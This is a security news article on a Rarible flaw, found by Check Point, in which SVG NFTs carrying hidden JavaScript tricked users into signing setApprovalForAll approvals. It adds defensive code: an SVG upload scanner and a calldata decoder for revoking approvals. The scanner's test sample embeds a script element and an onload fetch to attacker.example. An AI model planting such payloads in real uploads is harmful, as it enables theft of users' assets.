Flaw in Rarible NFT market allowed tricky crypto asset transfers

A security flaw in the Rarible NFT (non-fungible token) market allowed threat actors to use a relatively simple trick to steal digital assets and transfer them directly to their wallets.

Rarible is a community-focused NFT marketplace that offers up to 50% royalties, has 2.1 million registered users, hundreds of millions of US dollars in annual trade volumes, and support for three blockchains.

The flaw was discovered by analysts at Check Point, who worked with Rarible to implement a fix.

Users who may already have been targeted should still review the token approvals they granted through earlier fraudulent transaction requests and revoke any they do not recognize.

Hiding code inside an NFT

The issue stems from the risk inherent in the "setApprovalForAll" function of the ERC-721 NFT standard (EIP-721): it lets a token owner designate an "operator" address that may transfer every token the owner holds in that contract, with no per-token confirmation, until the approval is revoked.

Example of a fraudulent approval request (Check Point)

By crafting an apparently innocuous transaction request and getting the asset holder to sign it, phishing actors can steal their target's NFTs or even take over the wallet without alerting the victim.

The specific flaw in Rarible was that the platform let users upload media files of up to 100 MB without checking them for potentially malicious content.

Building on that, Check Point researchers found they could create an SVG image carrying a hidden JavaScript payload (SVG is XML and may contain script elements and event-handler attributes) and upload it to Rarible as an NFT offered for sale.

Malicious NFT uploaded to Rarible (Check Point)

Clicking the NFT image or its IPFS link would execute the embedded code, which then presented the target with a "setApprovalForAll" transaction request in their browser wallet.

If the victim is careless or misunderstands what the transaction does, they may approve the request, which hands the attacker control over their entire collection in that contract.

From there, the attacker calls "transferFrom" and simply moves the NFTs to a wallet they control. As with every confirmed blockchain transaction, this cannot be reversed.
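The check that was missing on the upload path is easy to show in code. The following JavaScript is an added example, not code from Rarible or Check Point: an allowlist scanner that rejects any uploaded SVG containing script elements, event-handler attributes, external references or obfuscation constructs. The two SVG samples are constructed for the demonstration; the 1 MiB size cap and the element allowlist are assumptions. The tokenizer is regex-based so the example runs offline in Node; a production check should parse with a real XML parser or a sanitizer such as DOMPurify, and should additionally serve user uploads from a sandboxed origin so that a payload the scanner misses cannot run in the marketplace's own origin.

```javascript
// Added example, not code from Rarible or Check Point: allowlist scanner for
// uploaded SVG files. Rejects the script-bearing SVG technique described above.

// Assumed size cap; vector art rarely needs more (Rarible accepted up to 100 MB).
const MAX_BYTES = 1024 * 1024;

// Elements a marketplace thumbnail legitimately needs. Anything else is rejected,
// which covers <script>, <foreignObject>, <image>, <a>, <animate>, <set>, etc.
const ALLOWED_ELEMENTS = new Set([
  'svg', 'g', 'defs', 'title', 'desc', 'path', 'rect', 'circle', 'ellipse', 'line',
  'polyline', 'polygon', 'text', 'tspan', 'linearGradient', 'radialGradient',
  'stop', 'clipPath', 'mask', 'use',
]);
const URL_ATTRS = new Set(['href', 'xlink:href']);

// Returns { ok, findings }; findings is empty when the file passes.
function scanSvg(svgText) {
  const findings = [];
  if (new TextEncoder().encode(svgText).length > MAX_BYTES) {
    findings.push(`file exceeds ${MAX_BYTES} bytes`);
  }
  // Entity declarations and CDATA are classic places to hide or obfuscate payloads.
  if (/<!DOCTYPE|<!ENTITY|<!\[CDATA\[/i.test(svgText)) {
    findings.push('DOCTYPE, ENTITY or CDATA section present');
  }
  // Numeric character references can spell out "javascript:" piecewise.
  if (/&#/.test(svgText)) findings.push('numeric character reference present');
  // Processing instructions other than the XML declaration (e.g. xml-stylesheet).
  if (/<\?(?!xml[\s?])/.test(svgText)) findings.push('processing instruction present');

  // Simplified tokenizer: one match per start/end tag, then one per attribute.
  const tagRe = /<\s*\/?\s*([A-Za-z][\w:.-]*)([^>]*)>/g;
  const attrRe = /([A-Za-z_:][\w:.-]*)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/g;
  let tag;
  while ((tag = tagRe.exec(svgText)) !== null) {
    const [, name, rawAttrs] = tag;
    if (!ALLOWED_ELEMENTS.has(name)) findings.push(`element <${name}> not allowed`);
    let attr;
    while ((attr = attrRe.exec(rawAttrs)) !== null) {
      const attrName = attr[1].toLowerCase();
      const value = attr[2].replace(/^["']|["']$/g, '');
      // Every on* attribute in SVG is an event handler, i.e. script.
      if (attrName.startsWith('on')) {
        findings.push(`event handler ${attr[1]} on <${name}>`);
      }
      // href may only point at a fragment inside this same document.
      if (URL_ATTRS.has(attrName) && !value.startsWith('#')) {
        findings.push(`external reference ${attr[1]}="${value}" on <${name}>`);
      }
      // javascript:/data: URLs, and url() to anything but a local fragment.
      if (/javascript:|data:|url\s*\(\s*['"]?\s*(?!#)/i.test(value)) {
        findings.push(`script or remote URL in ${attr[1]} on <${name}>`);
      }
    }
  }
  return { ok: findings.length === 0, findings };
}

// Constructed samples, not the researchers' actual file.
const MALICIOUS_SVG = `<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="300" height="300">
  <rect width="300" height="300" fill="#1d1d1d"/>
  <text x="20" y="150" fill="#fff">Rare Ape #1</text>
  <script>/* stand-in for a payload that asks the wallet to sign setApprovalForAll */</script>
  <rect width="1" height="1" onload="fetch('https://attacker.example/ping')"/>
</svg>`;

const BENIGN_SVG = `<svg xmlns="http://www.w3.org/2000/svg" width="300" height="300">
  <defs><linearGradient id="g"><stop offset="0" stop-color="#f0f"/><stop offset="1" stop-color="#0ff"/></linearGradient></defs>
  <circle cx="150" cy="150" r="120" fill="url(#g)"/>
</svg>`;

console.log(scanSvg(MALICIOUS_SVG));
console.log(scanSvg(BENIGN_SVG));
```

Rejecting the file at upload is only half of the fix: even a clean-looking SVG should never be served inline from the marketplace's origin, because a browser executes scripts in an SVG opened directly (or via its IPFS gateway link) but not in one embedded with an `<img>` tag.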

Transfer of NFTs to external wallets (Check Point)

Check Point's report mentions a real-world case of such abuse against Taiwanese celebrity Jay Chou, who recently lost a "Bored Ape" NFT worth $500,000 to a transaction-signature scam.

How to protect your assets

It is important to underline that Rarible is not the only market with this specific defect, as Check Point discovered a very similar problem in OpenSea last year.

Essentially, the problem lies with the NFT transaction standard and the ambiguity of signature requests, which makes it difficult for asset holders to assess their authenticity and real scope.

For this reason, any time you receive a request to sign something, examine it carefully to determine what it is. If in doubt, do not authorize the transaction.

Users are advised to use a token approval checker (the report links to one) to review their previous approvals and revoke any that appear fraudulent.
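To make the two preceding steps concrete (examine what a signing request really does, then revoke approvals you did not mean to grant), here is an added example in JavaScript, not code from Rarible or Check Point. It decodes the `data` field of an `eth_sendTransaction` request for the ERC-721 functions named in this article and states in plain words what signing it would authorize, then builds the calldata for the `setApprovalForAll(operator, false)` transaction that revokes an existing operator. The function selectors are the first four bytes of keccak256 over each signature and are hard-coded so the example runs offline; the contract, owner and operator addresses are constructed for the demonstration.

```javascript
// Added example, not code from Rarible or Check Point: decode ERC-721 calldata in a
// wallet transaction request and build the matching revocation transaction.

// selector -> signature, ABI types and human-readable argument names.
const SELECTORS = {
  'a22cb465': { sig: 'setApprovalForAll(address,bool)', types: ['address', 'bool'], names: ['operator', 'approved'] },
  '095ea7b3': { sig: 'approve(address,uint256)', types: ['address', 'uint256'], names: ['to', 'tokenId'] },
  '23b872dd': { sig: 'transferFrom(address,address,uint256)', types: ['address', 'address', 'uint256'], names: ['from', 'to', 'tokenId'] },
  '42842e0e': { sig: 'safeTransferFrom(address,address,uint256)', types: ['address', 'address', 'uint256'], names: ['from', 'to', 'tokenId'] },
};

const strip0x = (hex) => hex.toLowerCase().replace(/^0x/, '');

// Left-pad a hex value to one 32-byte ABI word.
const word = (hex) => strip0x(hex).padStart(64, '0');

function decodeWord(type, w) {
  if (type === 'address') return '0x' + w.slice(24);   // last 20 bytes of the word
  if (type === 'bool') return BigInt('0x' + w) !== 0n;
  return BigInt('0x' + w);                              // uint256
}

// Classify what signing this calldata would let the counterparty do.
function assessRisk(sig, args) {
  if (sig === null) return ['UNKNOWN', 'unrecognised function; decline unless you can verify it independently'];
  if (sig.startsWith('setApprovalForAll')) {
    return args.approved
      ? ['HIGH', `grants ${args.operator} the right to transfer EVERY token you hold in this contract, until revoked`]
      : ['REVOKE', `removes ${args.operator}'s operator rights over your tokens in this contract`];
  }
  if (sig.startsWith('approve')) return ['MEDIUM', `lets ${args.to} transfer token #${args.tokenId} only`];
  return ['TRANSFER', `moves token #${args.tokenId} from ${args.from} to ${args.to} right now`];
}

function decodeCalldata(data) {
  const hex = strip0x(data);
  if (hex.length < 8 || !/^[0-9a-f]*$/.test(hex)) throw new Error('malformed calldata');
  const selector = hex.slice(0, 8);
  const entry = SELECTORS[selector];
  if (!entry) {
    const [risk, explanation] = assessRisk(null, {});
    return { selector, sig: null, args: {}, risk, explanation };
  }
  const body = hex.slice(8);
  if (body.length !== entry.types.length * 64) {
    throw new Error(`expected ${entry.types.length} arguments for ${entry.sig}`);
  }
  const args = {};
  entry.types.forEach((type, i) => {
    args[entry.names[i]] = decodeWord(type, body.slice(i * 64, i * 64 + 64));
  });
  const [risk, explanation] = assessRisk(entry.sig, args);
  return { selector, sig: entry.sig, args, risk, explanation };
}

// Calldata for setApprovalForAll(operator, false): the transaction a victim sends
// to the NFT contract itself to revoke an operator they previously approved.
function buildRevocation(operator) {
  return '0xa22cb465' + word(operator) + word('0');
}

// Constructed addresses for the demonstration.
const OPERATOR = '0x1111111111111111111111111111111111111111';
const OWNER = '0x2222222222222222222222222222222222222222';

// What the phishing page hands to the wallet: setApprovalForAll(OPERATOR, true).
const PHISHED_REQUEST = {
  to: '0x3333333333333333333333333333333333333333', // the NFT contract (constructed)
  data: '0xa22cb465' + word(OPERATOR) + word('1'),
};

console.log(decodeCalldata(PHISHED_REQUEST.data));
console.log(decodeCalldata(buildRevocation(OPERATOR)));
```

The decoder only covers on-chain transaction requests. Marketplaces also ask for off-chain typed-data signatures (EIP-712) that authorize listings and orders; those need the same scrutiny but are a different format, and a revocation there means cancelling the order on the marketplace contract rather than calling `setApprovalForAll`.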

Due to the way these attacks work, there is often a delay between access approvals and asset transfers, so there may still be time for some victims.

As pioneering as blockchain technology may be, the aspect of protecting user assets is still lagging behind, so investors need to be very cautious about everything.
